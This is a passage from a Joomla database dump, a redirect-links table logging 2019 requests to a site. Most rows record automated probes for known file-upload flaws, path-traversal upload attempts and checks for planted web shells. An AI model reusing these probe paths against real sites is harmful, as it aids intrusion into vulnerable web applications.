00:00:00',301),(22294,'http://proneo-led.com/3s-technologies.com.tr/joomla//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:27','0000-00-00 00:00:00',301),(22295,'http://proneo-led.com/3s-technologies.com.tr/joomla/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:27','0000-00-00 00:00:00',301),(22296,'http://proneo-led.com/3s-technologies.com.tr/joomla//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:28','0000-00-00 00:00:00',301),(22297,'http://proneo-led.com/3s-technologies.com.tr/joomla//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:28','0000-00-00 00:00:00',301),(22298,'http://proneo-led.com/3s-technologies.com.tr/joomla//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:28','0000-00-00 00:00:00',301),(22299,'http://proneo-led.com/3s-technologies.com.tr/joomla//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:29','0000-00-00 00:00:00',301),(22300,'http://proneo-led.com/3s-technologies.com.tr/joomla//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:29','0000-00-00 00:00:00',301),(22301,'http://proneo-led.com/3s-technologies.com.tr/joomla//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:29','0000-00-00 00:00:00',301),(22302,'http://proneo-led.com/3s-technologies.com.tr/joomla//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:30','0000-00-00 00:00:00',301),(22303,'http://proneo-led.com/3s-technologies.com.tr/joomla//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:58:30','0000-00-00 00:00:00',301),(22304,'http://proneo-led.com/3s-technologies.com.tr/joomla//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',2,0,'2019-03-27 12:58:31','0000-00-00 00:00:00',301),(22305,'http://proneo-led.com/3s-technologies.com.tr/joomla//wp-admin/admin-ajax.php',NULL,'','',6,0,'2019-03-27 12:58:31','0000-00-00 00:00:00',301),(22306,'http://proneo-led.com/3s-technologies.com.tr/joomla//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',2,0,'2019-03-27 12:58:34','0000-00-00 00:00:00',301),(22307,'http://proneo-led.com/3s-technologies.com.tr/joomla//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',2,0,'2019-03-27 12:58:36','0000-00-00 00:00:00',301),(22308,'http://proneo-led.com/3s-technologies.com.tr/joomla//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',2,0,'2019-03-27 12:58:40','0000-00-00 00:00:00',301),(22309,'http://proneo-led.com/3s-technologies.com.tr/joomla//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',2,0,'2019-03-27 12:58:41','0000-00-00 00:00:00',301),(22310,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/media/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:58:42','0000-00-00 00:00:00',301),(22311,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:58:43','0000-00-00 00:00:00',301),(22312,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/food.php',NULL,'','',2,0,'2019-03-27 12:58:46','0000-00-00 00:00:00',301),(22313,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/explore.php',NULL,'','',2,0,'2019-03-27 12:58:48','0000-00-00 00:00:00',301),(22314,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/jdownloads/screenshots/test.php.j?up=kido',NULL,'','',4,0,'2019-03-27 12:58:48','0000-00-00 00:00:00',301),(22315,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/jdownloads/screenshots/gelo.php.j',NULL,'','',2,0,'2019-03-27 12:58:49','0000-00-00 00:00:00',301),(22316,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/jdownloads/screenshots/komo.php.j',NULL,'','',2,0,'2019-03-27 12:58:51','0000-00-00 00:00:00',301),(22317,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/jdownloads/screenshots/agger.php.j',NULL,'','',2,0,'2019-03-27 12:58:51','0000-00-00 00:00:00',301),(22318,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/jdownloads/screenshots/.libs.up.php.j',NULL,'','',2,0,'2019-03-27 12:58:52','0000-00-00 00:00:00',301),(22319,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/jdownloads/screenshots/roin.php.j',NULL,'','',2,0,'2019-03-27 12:58:52','0000-00-00 00:00:00',301),(22320,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/media/system/js/index.php?up=kido',NULL,'','',2,0,'2019-03-27 12:58:53','0000-00-00 00:00:00',301),(22321,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/plugins/editors/index.php?nila2114',NULL,'','',2,0,'2019-03-27 12:58:54','0000-00-00 00:00:00',301),(22322,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/jdownloads/screenshots/.libs.php.j',NULL,'','',2,0,'2019-03-27 12:58:54','0000-00-00 00:00:00',301),(22323,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/media/system/js/index.inc.php?up=kido',NULL,'','',2,0,'2019-03-27 12:58:58','0000-00-00 00:00:00',301),(22324,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_creativecontactform/fileupload/files/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:01','0000-00-00 00:00:00',301),(22325,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/test.php.gif?up=kido',NULL,'','',2,0,'2019-03-27 12:59:02','0000-00-00 00:00:00',301),(22326,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/case.php.gif?up=kido',NULL,'','',2,0,'2019-03-27 12:59:03','0000-00-00 00:00:00',301),(22327,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_sexycontactform/fileupload/files/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:04','0000-00-00 00:00:00',301),(22328,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/com_adsmanager/ads/uploaded/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:06','0000-00-00 00:00:00',301),(22329,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/tmp/plupload/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:07','0000-00-00 00:00:00',301),(22330,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:08','0000-00-00 00:00:00',301),(22331,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:09','0000-00-00 00:00:00',301),(22332,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:11','0000-00-00 00:00:00',301),(22333,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_jnews/includes/openflashchart/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:12','0000-00-00 00:00:00',301),(22334,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:12','0000-00-00 00:00:00',301),(22335,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_jinc/classes/graphics/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:14','0000-00-00 00:00:00',301),(22336,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/administrator/components/com_maian15/charts/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:14','0000-00-00 00:00:00',301),(22337,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_maian15/charts/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:15','0000-00-00 00:00:00',301),(22338,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:16','0000-00-00 00:00:00',301),(22339,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/test.php',NULL,'','',2,0,'2019-03-27 12:59:17','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (22340,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',2,0,'2019-03-27 12:59:18','0000-00-00 00:00:00',301),(22341,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_acymailing/inc/openflash/tmp-upload-images/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:19','0000-00-00 00:00:00',301),(22342,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/administrator/components/com_bt_portfolio/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:20','0000-00-00 00:00:00',301),(22343,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:21','0000-00-00 00:00:00',301),(22344,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/avada/framework/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:21','0000-00-00 00:00:00',301),(22345,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/liofolio/lioit/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:23','0000-00-00 00:00:00',301),(22346,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:23','0000-00-00 00:00:00',301),(22347,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/centum/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:24','0000-00-00 00:00:00',301),(22348,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:26','0000-00-00 00:00:00',301),(22349,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:29','0000-00-00 00:00:00',301),(22350,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:30','0000-00-00 00:00:00',301),(22351,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/royaloak/framework/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:30','0000-00-00 00:00:00',301),(22352,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/pindol/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:32','0000-00-00 00:00:00',301),(22353,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:34','0000-00-00 00:00:00',301),(22354,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/paragon/framework/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:34','0000-00-00 00:00:00',301),(22355,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/cuckoobizz/framework/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:35','0000-00-00 00:00:00',301),(22356,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:35','0000-00-00 00:00:00',301),(22357,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/schema-corporate/classes/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:36','0000-00-00 00:00:00',301),(22358,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/incrediblewp/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:37','0000-00-00 00:00:00',301),(22359,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/nevada/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:37','0000-00-00 00:00:00',301),(22360,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/coffeeandcream/includes/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:38','0000-00-00 00:00:00',301),(22361,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/edwards-theme/js/revslider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:38','0000-00-00 00:00:00',301),(22362,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/plugins/showbiz/temp/update_extract/showbiz/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:39','0000-00-00 00:00:00',301),(22363,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/plugins/revolution-slider/temp/update_extract/revolution-slider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:40','0000-00-00 00:00:00',301),(22364,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/bazar/theme/templates/sliders/revolution-slider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:41','0000-00-00 00:00:00',301),(22365,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wp-content/themes/stendhal/theme/templates/sliders/revolution-slider/temp/update_extract/revslider/test.php?up=kido',NULL,'','',2,0,'2019-03-27 12:59:41','0000-00-00 00:00:00',301),(22366,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_b2jcontact/pagat.php',NULL,'','',2,0,'2019-03-27 12:59:42','0000-00-00 00:00:00',301),(22367,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/pagat.php',NULL,'','',2,0,'2019-03-27 12:59:44','0000-00-00 00:00:00',301),(22368,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_b2jcontact/zink.php?zonk',NULL,'','',4,0,'2019-03-27 12:59:45','0000-00-00 00:00:00',301),(22369,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-27 13:02:23','0000-00-00 00:00:00',301),(22370,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 13:02:24','0000-00-00 00:00:00',301),(22371,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 13:02:24','0000-00-00 00:00:00',301),(22372,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-27 13:02:25','0000-00-00 00:00:00',301),(22373,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:25','0000-00-00 00:00:00',301),(22374,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:26','0000-00-00 00:00:00',301),(22375,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:26','0000-00-00 00:00:00',301),(22376,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:26','0000-00-00 00:00:00',301),(22377,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:27','0000-00-00 00:00:00',301),(22378,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:27','0000-00-00 00:00:00',301),(22379,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:27','0000-00-00 00:00:00',301),(22380,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:28','0000-00-00 00:00:00',301),(22381,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:28','0000-00-00 00:00:00',301),(22382,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:28','0000-00-00 00:00:00',301),(22383,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:28','0000-00-00 00:00:00',301),(22384,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:02:29','0000-00-00 00:00:00',301),(22385,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-27 13:02:29','0000-00-00 00:00:00',301),(22386,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-27 13:02:30','0000-00-00 00:00:00',301),(22387,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-27 13:02:31','0000-00-00 00:00:00',301),(22388,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-27 13:02:31','0000-00-00 00:00:00',301),(22389,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-27 13:02:32','0000-00-00 00:00:00',301),(22390,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewivx6nhoklhahukmiskhz5jd544hhawcoibmdm&amp;usg=aovvaw3yprnmwz6gqojoswr4zxct//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-27 13:02:32','0000-00-00 00:00:00',301),(22391,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-27 13:08:03','0000-00-00 00:00:00',301),(22392,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 13:08:04','0000-00-00 00:00:00',301),(22393,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-27 13:08:05','0000-00-00 00:00:00',301),(22394,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-27 13:08:05','0000-00-00 00:00:00',301),(22395,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:05','0000-00-00 00:00:00',301),(22396,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewijxslhoklhahwu_cokhs2lcgs4kbawclybmck&amp;usg=aovvaw2wxij6rahgv7qzcaxevjmc//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-27 13:08:06','0000-00-00 